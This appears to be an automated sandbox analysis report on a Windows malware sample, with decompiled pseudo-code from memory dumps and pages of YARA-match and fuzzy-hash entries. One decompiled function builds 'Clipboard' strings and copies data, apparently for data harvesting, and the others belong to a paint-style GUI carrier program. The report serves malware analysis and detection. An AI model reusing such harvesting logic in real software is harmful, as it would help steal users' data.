                                              
                                              				_t55 = __ecx;
                                              				asm("adc ebp, edx");
                                              				if(__eflags < 0) {
                                              					 *_t30 =  *_t30 + _t30;
                                              					__eflags = _t30;
                                              					if(_t30 == 0) {
                                              						_t59 =  *((intOrPtr*)(_t69 + 0xc));
                                              						__eflags = _t30 | 0x00000057;
                                              						E00419CB0(_t51, _t59, _t69);
                                              						asm("les ecx, [ebx+esi]");
                                              						_t76 = _t69;
                                              						_pop(_t69);
                                              						 *((short*)(_t69 - 4)) = _t55;
                                              						_t53 = _t66 + 0x4464;
                                              						 *((intOrPtr*)(_t69 - 0xc)) = 0xa000d;
                                              						 *((intOrPtr*)(_t69 - 8)) = 0xa000d;
                                              						 *((intOrPtr*)(_t69 - 0x3c)) = 0x6c0043;
                                              						 *((intOrPtr*)(_t69 - 0x38)) = 0x700069;
                                              						 *((intOrPtr*)(_t69 - 0x34)) = 0x6f0062;
                                              						 *((intOrPtr*)(_t69 - 0x30)) = 0x720061;
                                              						 *((intOrPtr*)(_t69 - 0x2c)) = 0x64;
                                              						 *((short*)(_t69 - 0x28)) = 0;
                                              						 *((intOrPtr*)(_t69 - 0x26)) = 0;
                                              						 *((intOrPtr*)(_t69 - 0x22)) = 0;
                                              						 *((short*)(_t69 - 0x1e)) = 0;
                                              						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xcc0))))(_t66 + 0x4464, 0x104);
                                              						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xcbc))))(0);
                                              						__eflags = 0 - 0x40;
                                              						if(0 <= 0x40) {
                                              							__eflags = 0;
                                              							if(0 == 0) {
                                              								 *((intOrPtr*)(_t69 - 0x1c)) = 0x6e0055;
                                              								 *((intOrPtr*)(_t69 - 0x18)) = 0x6e006b;
                                              								 *((intOrPtr*)(_t69 - 0x14)) = 0x77006f;
                                              								 *((intOrPtr*)(_t69 - 0x10)) = 0x6e;
                                              								E00419CB0(_t53, _t69 - 0x1c, 0x10);
                                              								_t76 = _t76 + 0xc;
                                              							}
                                              						} else {
                                              							 *((short*)(_t66 + 0x44e4)) = 0;
                                              						}
                                              						_t64 = _t66 + 0x4ce4;
                                              						E00419CB0(_t66 + 0x4ce4, _t69 - 0x3c, 0x14);
                                              						E0041A110(_t66 + 0x4ce4, _t66, _t66 + 0x4ce4, _t69 - 0xc, 0);
                                              						E0041A110(_t64, _t66, _t64, _t53, 0);
                                              						E0041A110(_t64, _t66, _t64, _t69 - 0xc, 0);
                                              						E0041A110(_t64, _t66, _t64,  *((intOrPtr*)(_t69 + 0xc)), 0);
                                              						 *((intOrPtr*)(_t66 + 0xa08)) = E00419FA0(_t64) + _t42;
                                              						__eflags = E00419FA0(_t64) + _t44;
                                              						E00419CB0( *((intOrPtr*)(_t66 + 0xa04)), _t64, E00419FA0(_t64) + _t44);
                                              						_t30 = E0040CE00(_t66, 0x13);
                                              					}
                                              					return _t30;
                                              				} else {
                                              					asm("cli");
                                              					_push(0xffffffaf);
                                              					asm("scasd");
                                              					return 1;
                                              				}
                                              			}

                                              0x00406aa2
                                              0x00406aa2
                                              0x00406aa4
                                              0x00406b13
                                              0x00406b18
                                              0x00406b1a
                                              0x00406b20
                                              0x00406b22
                                              0x00406b26
                                              0x00406b2c
                                              0x00406b2f
                                              0x00406b2f
                                              0x00406b37
                                              0x00406b41
                                              0x00406b48
                                              0x00406b4f
                                              0x00406b56
                                              0x00406b5d
                                              0x00406b64
                                              0x00406b6b
                                              0x00406b72
                                              0x00406b79
                                              0x00406b7d
                                              0x00406b80
                                              0x00406b83
                                              0x00406b87
                                              0x00406b90
                                              0x00406b92
                                              0x00406b95
                                              0x00406ba2
                                              0x00406ba4
                                              0x00406bad
                                              0x00406bb4
                                              0x00406bbb
                                              0x00406bc2
                                              0x00406bc9
                                              0x00406bce
                                              0x00406bce
                                              0x00406b97
                                              0x00406b99
                                              0x00406b99
                                              0x00406bd7
                                              0x00406bde
                                              0x00406bea
                                              0x00406bf3
                                              0x00406bff
                                              0x00406c0b
                                              0x00406c1c
                                              0x00406c2d
                                              0x00406c32
                                              0x00406c3a
                                              0x00406c3f
                                              0x00406c48
                                              0x00406aa6
                                              0x00406aa6
                                              0x00406aa7
                                              0x00406aa8
                                              0x00406ab8
                                              0x00406ab8

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C$a$b$d$i
                                              • API String ID: 0-2334916691
                                              • Opcode ID: 515cbd1d688cb2e24db0e980ba2879dfe6454d645799f915690ef55488c76b10
                                              • Instruction ID: f3c74023adc1cf6cf4df2934c757a26496a9e7a59011964b0e5a2185914ff36e
                                              • Opcode Fuzzy Hash: 515cbd1d688cb2e24db0e980ba2879dfe6454d645799f915690ef55488c76b10
                                              • Instruction Fuzzy Hash: 9B318FB1A00308BAEB10EFA1DC82FFEB3B8AF85714F00451EF515A7242E779595187AD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2379e49ccd2abb7d4460b415da91cf2f25e72e5050ebd7d99632e8663e26f751
                                              • Instruction ID: e697e7aebe332b01f8eb278df54031ee1d05430c2d5280181dd025482a47c36b
                                              • Opcode Fuzzy Hash: 2379e49ccd2abb7d4460b415da91cf2f25e72e5050ebd7d99632e8663e26f751
                                              • Instruction Fuzzy Hash: 3FC08C3290A06089A7029E88B2980B0EB74E483122B0022A7C90A2B4028008C009C349
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0d764d71c0c3e06c81e4cad75e65ad3e38ebfe79b1c94f5463c68e5524ed222
                                              • Instruction ID: 019b637a3a96ae8a97111abd8e0ef4187801ec3d097a5612eff5f490607ec59e
                                              • Opcode Fuzzy Hash: f0d764d71c0c3e06c81e4cad75e65ad3e38ebfe79b1c94f5463c68e5524ed222
                                              • Instruction Fuzzy Hash: C29002A121100042D10471998404B061046A7E1341F51C112E3148668CC5698D656165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25aabe7704a035536a6b9cdf9d6767313488dfab3682de88c9b95c13e1f64074
                                              • Instruction ID: 3536b070d9ffdfc7c212d95d11a694bab670a1d86dd276c52fbf09c50153c577
                                              • Opcode Fuzzy Hash: 25aabe7704a035536a6b9cdf9d6767313488dfab3682de88c9b95c13e1f64074
                                              • Instruction Fuzzy Hash: F390027120100802D10471998804A861006A7D0341F51C111E7018769ED6A589957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23e212800c91544aec4a8df8a9c57d03e4fcf567531e950ad867b9c1f14fc1d8
                                              • Instruction ID: 74c674529d9c2c24c2caa4b922e759d5280d473d2c2592c211c170ece78fabea
                                              • Opcode Fuzzy Hash: 23e212800c91544aec4a8df8a9c57d03e4fcf567531e950ad867b9c1f14fc1d8
                                              • Instruction Fuzzy Hash: 109002E1201140924500B299C404F0A5506A7E0341B51C116E2048674CC5658955A175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 735b03fc5cbcbd5f9a75bc000a30a2c8b8d92dfce6efd4befdcee91ae1dcbea8
                                              • Instruction ID: 5ab047cbefb282789656826a988360a037c722fd590557224b4d6532c2b4e691
                                              • Opcode Fuzzy Hash: 735b03fc5cbcbd5f9a75bc000a30a2c8b8d92dfce6efd4befdcee91ae1dcbea8
                                              • Instruction Fuzzy Hash: 21900271A0500012914071998814A465007B7E0781B55C111E1508668CC9948B5963E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9681a0fd5b09bc94007560e86a833e900da6eed0da73b94aacf78cf353267e10
                                              • Instruction ID: 93904ecdaab2a6f03f860ca7568498172da0ae132d499dc8d98eb2fc07eb5157
                                              • Opcode Fuzzy Hash: 9681a0fd5b09bc94007560e86a833e900da6eed0da73b94aacf78cf353267e10
                                              • Instruction Fuzzy Hash: DF9002A120140403D14075998804A071006A7D0342F51C111E3058669ECA698D557175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33d177281954ad82a62da2fb69b59d613301415f76d84c7cdeb8efb82efae700
                                              • Instruction ID: 85deb8b43a04ff192466d4bf55fc78167941550b94488e2393c7d4b39f511986
                                              • Opcode Fuzzy Hash: 33d177281954ad82a62da2fb69b59d613301415f76d84c7cdeb8efb82efae700
                                              • Instruction Fuzzy Hash: 88900265221000020145B599460490B1446B7D6391391C115F240A6A4CC66189696361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37d43daeae45e85de1998b18e85a72e39f7fd9b6e201205c08c164487b031acb
                                              • Instruction ID: c789fe835ed7c6055c8e5d09b9d377dc951e74c69871be017216d3ef73e22160
                                              • Opcode Fuzzy Hash: 37d43daeae45e85de1998b18e85a72e39f7fd9b6e201205c08c164487b031acb
                                              • Instruction Fuzzy Hash: A490026130100402D10271998414A06100AE7D1385F91C112E2418669DC6658A57B172
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3032f117b8332c69923d573d192d5e6a93173cb7a0113ae0070c47d54da6109f
                                              • Instruction ID: cf942c85eb6996d931d597cd6f3a80bf78851b0b181c312068a8c50db1516d75
                                              • Opcode Fuzzy Hash: 3032f117b8332c69923d573d192d5e6a93173cb7a0113ae0070c47d54da6109f
                                              • Instruction Fuzzy Hash: 2290027124100402D14171998404A06100AB7D0381F91C112E1418668EC6958B5ABAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba2bf841d381854de968d763b9b90b7f950666956ed7bca99fa4c129c278b6e8
                                              • Instruction ID: c3b0c518eb6e884d1d8aa5d6c8fa6c862f44f371c6c42c107750c2b6e61aa40b
                                              • Opcode Fuzzy Hash: ba2bf841d381854de968d763b9b90b7f950666956ed7bca99fa4c129c278b6e8
                                              • Instruction Fuzzy Hash: F19002A1601140434540B19988048066016B7E1341391C221E1448674CC6A88959A2A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04a63e3cec9e243e31fafc3b495dc8debb21824d04f5f393023b58fd75b64733
                                              • Instruction ID: 823e72626ca10648bb0f7473d48ced51f7e2e0ff173af61cbde1af92ada88ac8
                                              • Opcode Fuzzy Hash: 04a63e3cec9e243e31fafc3b495dc8debb21824d04f5f393023b58fd75b64733
                                              • Instruction Fuzzy Hash: D590027120144002D1407199C444A0B6006B7E0341F51C511E1419668CC655895AA261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0df984baa2bbfcc7d614cc7827065916b2fb21aa5c39fdee40e4bdcafb854cf
                                              • Instruction ID: 7f522788c1cacc601abbfd84a2b1699a9235e421586dbad39df35e28ca9f622b
                                              • Opcode Fuzzy Hash: a0df984baa2bbfcc7d614cc7827065916b2fb21aa5c39fdee40e4bdcafb854cf
                                              • Instruction Fuzzy Hash: 0690026124100802D1407199C414B071007E7D0741F51C111E1018668DC6568A6976F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e376f3b45e29f99ddfaeea2dbf62aa70fd0d78284b4e2ee31ae7b15d95928933
                                              • Instruction ID: b15f28d7814400ef1fae817816f0538f350c3a2995c418bd4a4672605f606b0f
                                              • Opcode Fuzzy Hash: e376f3b45e29f99ddfaeea2dbf62aa70fd0d78284b4e2ee31ae7b15d95928933
                                              • Instruction Fuzzy Hash: 68900271301000529500B6D99804E4A5106A7F0341B51D115E5008668CC59489656161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d121f989ae1949e6c542f6b3717890e064012c5e58726498ace0487cbe21c715
                                              • Instruction ID: 98ba5f9a71aa8284f8b55b39d14cc5953ee003e1876d732cfa7485c411cd6b2e
                                              • Opcode Fuzzy Hash: d121f989ae1949e6c542f6b3717890e064012c5e58726498ace0487cbe21c715
                                              • Instruction Fuzzy Hash: 5490026160500402D14071999418B061016A7D0341F51D111E1018668DC6998B5976E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d0a90b593267f42f29ca1550db1472028e9909fe65f8226e7e1a961e3992226
                                              • Instruction ID: 51e0bb42af892c93c96ead7af9d9368af1cfb35eca6efa30c32b935a8683cfe3
                                              • Opcode Fuzzy Hash: 4d0a90b593267f42f29ca1550db1472028e9909fe65f8226e7e1a961e3992226
                                              • Instruction Fuzzy Hash: 2090027120100403D10071999508B071006A7D0341F51D511E141866CDD69689557161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 363ed10808bce3c06961de02a1bc74a0875adaf2a9945dd7ee9f4fafd4ef98f8
                                              • Instruction ID: 042c412a8fe99a69c682f254f2018f0fea1c2b2c2d4932910e79a542fef976eb
                                              • Opcode Fuzzy Hash: 363ed10808bce3c06961de02a1bc74a0875adaf2a9945dd7ee9f4fafd4ef98f8
                                              • Instruction Fuzzy Hash: 9590026120504442D10075999408E061006A7D0345F51D111E20586A9DC6758955B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc530121e7777367c632995ea79a8320ea7a307a46d4085f4d87a5ab2e9f40d4
                                              • Instruction ID: 0e632e5b0bdea82a8106aad45b3e43b1175a376e0c371628e7e3dd51d0b8a527
                                              • Opcode Fuzzy Hash: fc530121e7777367c632995ea79a8320ea7a307a46d4085f4d87a5ab2e9f40d4
                                              • Instruction Fuzzy Hash: C290027520504442D50075999804E871006A7D0345F51D511E14186ACDC6948965B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76da52fddc6a3a6e5e3c9288aa82e83e821fb81099aeb71e1b6e1aa2f308bbd9
                                              • Instruction ID: 9fca7300125f0021df9111a5f33061a138e7fd27d7e40248db88624fc324bd1e
                                              • Opcode Fuzzy Hash: 76da52fddc6a3a6e5e3c9288aa82e83e821fb81099aeb71e1b6e1aa2f308bbd9
                                              • Instruction Fuzzy Hash: 2190026120144442D14072998804F0F5106A7E1342F91C119E514A668CC95589596761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e955204ecdf58d390eac8771f0ca43aae290b757de30a2d7fc1d1c60facd4ef8
                                              • Instruction ID: 57b4ecc3c0595f4f574fa969f45a0c6d87c6dd3f44830b0fd8b5ef563ecb1d50
                                              • Opcode Fuzzy Hash: e955204ecdf58d390eac8771f0ca43aae290b757de30a2d7fc1d1c60facd4ef8
                                              • Instruction Fuzzy Hash: 6B90027120100842D10071998404F461006A7E0341F51C116E1118768DC655C9557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db138bd58840140e7868cac20a20728958bf0babf11d19cf471ac70109258fb6
                                              • Instruction ID: 4b8506339fce9029247c9bc374970b4b2352a17b912782e3c059b64988619a28
                                              • Opcode Fuzzy Hash: db138bd58840140e7868cac20a20728958bf0babf11d19cf471ac70109258fb6
                                              • Instruction Fuzzy Hash: 3C90027160500802D15071998414B461006A7D0341F51C111E1018768DC7958B5976E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1838f7acd7136aee9f51a45df192c3e6c634f3bf3b56ed3216ae78c8a90939ca
                                              • Instruction ID: cb23e46c04735034ee3fba3812199eab6d610ab404ea7232b2c4931e80dd8b58
                                              • Opcode Fuzzy Hash: 1838f7acd7136aee9f51a45df192c3e6c634f3bf3b56ed3216ae78c8a90939ca
                                              • Instruction Fuzzy Hash: B090027120140402D10071998808B471006A7D0342F51C111E6158669EC6A5C9957571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94c34a1bf2f0ed0914eee3c9eac2dbfc165b612af94abc2de95870b946d10d5b
                                              • Instruction ID: 59365fd1711ac32a5a20f8826fea6dbccb153bf847d90c1072e80355ede7805b
                                              • Opcode Fuzzy Hash: 94c34a1bf2f0ed0914eee3c9eac2dbfc165b612af94abc2de95870b946d10d5b
                                              • Instruction Fuzzy Hash: A790027120504842D14071998404E461016A7D0345F51C111E10587A8DD6658E59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: d975ec5fa384de7cd888f7d5195238c3e9466ff9fe64a4044f93480bd68a8d66
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC670(char _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                              				int _v8;
                                              				struct _WNDCLASSW _v48;
                                              				struct _WNDCLASSW _v88;
                                              
                                              				_v48.style = 0;
                                              				_v48.lpfnWndProc = 0;
                                              				_v48.cbClsExtra = 0;
                                              				_v48.cbWndExtra = 0;
                                              				_v48.hInstance = 0;
                                              				_v48.hIcon = 0;
                                              				_v48.hCursor = 0;
                                              				_v48.hbrBackground = 0;
                                              				_v48.lpszMenuName = 0;
                                              				_v48.lpszClassName = 0;
                                              				_v48.lpszClassName = L"Panel";
                                              				_v48.hbrBackground = GetStockObject(0);
                                              				_v48.lpfnWndProc = E002FCD70;
                                              				RegisterClassW( &_v48);
                                              				_v88.style = 0;
                                              				_v88.lpfnWndProc = 0;
                                              				_v88.cbClsExtra = 0;
                                              				_v88.cbWndExtra = 0;
                                              				_v88.hInstance = 0;
                                              				_v88.hIcon = 0;
                                              				_v88.hCursor = 0;
                                              				_v88.hbrBackground = 0;
                                              				_v88.lpszMenuName = 0;
                                              				_v88.lpszClassName = 0;
                                              				_v88.lpszClassName = L"Paper";
                                              				_v88.hbrBackground = GetStockObject(0);
                                              				_v88.lpfnWndProc = E002FCE30;
                                              				RegisterClassW( &_v88);
                                              				_v8 = 0xa;
                                              				_t30 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "P", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t30, 1, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t34 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "S", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t34, 2, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t38 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "L", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t38, 3, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t42 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "R", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t42, 4, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t46 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", L"Ci", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t46, 5, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t50 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "F", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t50, 6, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t54 =  &_a4; // 0x304860
                                              				 *_a8 = CreateWindowExW(0, L"Panel", 0, 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t54, 0, 0, 0);
                                              				_t57 =  &_a4; // 0x304860
                                              				 *_a12 = CreateWindowExW(0, L"Paper", 0, 0x50000000, 0x32, 0xa, 0x1f4, 0x15e,  *_t57, 0, 0, 0);
                                              				_t59 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "<", 0x50000000, 0x32, 0x172, 0x19, 0x19,  *_t59, 7, 0, 0);
                                              				_t60 =  &_a4; // 0x304860
                                              				return CreateWindowExW(0, L"Button", ">", 0x50000000, 0x50, 0x172, 0x19, 0x19,  *_t60, 8, 0, 0);
                                              			}

                                              Instruction addresses: 0x002fc676, 0x002fc67f, 0x002fc682, 0x002fc685, 0x002fc688, 0x002fc68b, 0x002fc68e, 0x002fc691, 0x002fc694, 0x002fc697, 0x002fc69a, 0x002fc6a9, 0x002fc6ac, 0x002fc6b7, 0x002fc6bd, 0x002fc6c6, 0x002fc6c9, 0x002fc6cc, 0x002fc6cf, 0x002fc6d2, 0x002fc6d5, 0x002fc6d8, 0x002fc6db, 0x002fc6de, 0x002fc6e1, 0x002fc6f0, 0x002fc6f3, 0x002fc6fe, 0x002fc704, 0x002fc711, 0x002fc730, 0x002fc73c, 0x002fc745, 0x002fc764, 0x002fc770, 0x002fc779, 0x002fc798, 0x002fc7a4, 0x002fc7ad, 0x002fc7cc, 0x002fc7d8, 0x002fc7e1, 0x002fc800, 0x002fc80c, 0x002fc815, 0x002fc834, 0x002fc840, 0x002fc849, 0x002fc86e, 0x002fc876, 0x002fc89f, 0x002fc8a7, 0x002fc8c7, 0x002fc8d3, 0x002fc8fc

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CreateWindow$ClassObjectRegisterStock
                                              • String ID: Button$Button$Button$Button$Button$Button$Button$Button$Panel$Paper$`H0$`H0$lH0
                                              • API String ID: 3256756162-2307794220
                                              • Opcode ID: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction ID: 424faa7f9534653367afee9729ea1560f13470f27dd87e2b3161a5a5f9d683d7
                                              • Opcode Fuzzy Hash: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction Fuzzy Hash: F281ECB4B80348BFFB11CF95DC56FAE7AB1AB48B05F208119F704BA2D0D6F16A009B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD400(void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				struct HDC__* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				struct HBITMAP__* _v20;
                                              				void* _v24;
                                              				int _v28;
                                              				intOrPtr _v56;
                                              				intOrPtr _v68;
                                              				intOrPtr _v84;
                                              				char* _v88;
                                              				WCHAR* _v104;
                                              				struct HWND__* _v112;
                                              				struct tagOFNA _v116;
                                              				char _v634;
                                              				char _v636;
                                              
                                              				_t86 = __edi;
                                              				_v636 =  *0x30593c;
                                              				E002F1D00(__edi,  &_v634, 0, 0x206);
                                              				_v28 = 0;
                                              				_v16 = _a8;
                                              				if(_v16 == 1) {
                                              					CreateWindowExW(0, L"button", 0x304ad8, 0x50000000, 5, 5, 0x4b, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v16 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v16 == 0x111) {
                                              							_v8 = GetDC( *0x3059b4);
                                              							_v12 = CreateCompatibleDC(_v8);
                                              							_v20 = CreateCompatibleBitmap(_v8, 0x1f4, 0x15e);
                                              							_v24 = SelectObject(_v12, _v20);
                                              							BitBlt(_v12, 0, 0, 0x1f4, 0x15e, _v8, 0, 0, 0xcc0020);
                                              							SelectObject(_v12, _v24);
                                              							DeleteObject(_v8);
                                              							DeleteObject(_v12);
                                              							E002F1D00(_t86,  &_v116, 0, 0x58);
                                              							_v116 = 0x58;
                                              							_v112 = _a4;
                                              							_v104 = L"Bmp File(*Bmp)";
                                              							_v88 =  &_v636;
                                              							_v84 = 0x104;
                                              							_v56 = 0x304b34;
                                              							_v68 = 0x304b40;
                                              							if(GetOpenFileNameW( &_v116) != 0) {
                                              								E002FB350(_v20, _v88);
                                              							}
                                              							DeleteObject(_v20);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}

                                              Instruction addresses: 0x002fd400, 0x002fd40f, 0x002fd424, 0x002fd42c, 0x002fd436, 0x002fd43d, 0x002fd47a, 0x002fd43f, 0x002fd443, 0x002fd57e, 0x002fd449, 0x002fd450, 0x002fd492, 0x002fd49f, 0x002fd4b6, 0x002fd4c7, 0x002fd4e9, 0x002fd4f7, 0x002fd501, 0x002fd50b, 0x002fd519, 0x002fd521, 0x002fd52b, 0x002fd52e, 0x002fd53b, 0x002fd53e, 0x002fd545, 0x002fd54c, 0x002fd55f, 0x002fd569, 0x002fd569, 0x002fd572, 0x002fd572, 0x002fd450, 0x002fd443, 0x002fd59d

